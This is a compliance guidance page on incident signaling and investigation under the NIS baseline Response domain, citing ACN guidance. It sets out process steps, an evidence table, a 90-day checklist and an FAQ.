Within the NIS baseline framework, the Response domain (RS) requires entities to execute incident response through structured sub-phases, including signaling and investigation. Operationally, this means teams must classify events, escalate appropriately, preserve evidence, and maintain a consistent flow toward decision and notification points.
Sources: ACN incident management guidance, ACN baseline obligations determination
Key takeaways
- Response should be run through documented phases, not ad hoc actions.
- Signaling and investigation are iterative and may loop as new evidence emerges.
- Roles and contacts for escalation and external interfaces must be pre-assigned.
- Investigation quality depends on evidence integrity, event correlation, and timeline reconstruction.
Sources: ACN incident management guidance
Signaling and investigation sequence
1. Event signaling and escalation
Teams should signal relevant events rapidly through predefined channels, with clear thresholds for escalation and decision ownership.
2. Initial response coordination (RS.MA)
The incident-response plan should activate procedures, responsibilities, and communication flows for management, technical teams, and external stakeholders.
3. Investigation workflow
Investigation should collect forensic evidence, correlate logs and artifacts, and build an evolving timeline of attacker actions and service impact.
4. Iterative decision loop
As investigation findings evolve, teams may return to signaling/escalation steps, refine incident qualification, and update response priorities.
5. Preparation for notification and containment handoff
Signaling and investigation outputs should be structured so they can support notification obligations and downstream containment/eradication actions.
Sources: ACN incident management guidance, ACN baseline obligations determination
Minimum evidence set for RS signaling/investigation
| RS area | Practical objective | Typical evidence |
|---|---|---|
| Signaling governance | Fast and repeatable event escalation | Signaling SOP, escalation matrix, contact list |
| Response activation | Coordinated incident-response execution | Incident playbook, activation records |
| Investigation integrity | Reliable technical and forensic analysis | Evidence log, chain-of-custody records, analysis notes |
| Timeline reconstruction | Coherent sequence of incident evolution | Event timeline, correlated log artifacts |
| Decision traceability | Documented response decisions and updates | Decision register, incident status reports |
Sources: ACN incident management guidance
90-day execution checklist
- Validate signaling thresholds and escalation ownership across cyber, operations, and legal teams.
- Test response-plan activation in a scenario with partial information and evolving evidence.
- Standardize investigation templates for evidence capture, correlation, and timeline building.
- Define criteria for when signaling returns to deeper investigation before new response actions.
- Ensure incident records can support both governance review and external reporting when required.
FAQ
Are signaling and investigation linear steps?
No. Guidance indicates response sub-phases can be iterative as new evidence changes incident understanding. Source: ACN incident management guidance
What is the minimum requirement for investigation evidence?
At minimum, organizations should preserve and document relevant evidence, correlation logic, and timeline updates supporting response decisions. Source: ACN incident management guidance
How does this phase connect to notification?
Signaling and investigation provide the factual basis used to determine whether notification obligations apply and what information is reported. Sources: ACN incident management guidance, ACN baseline obligations determination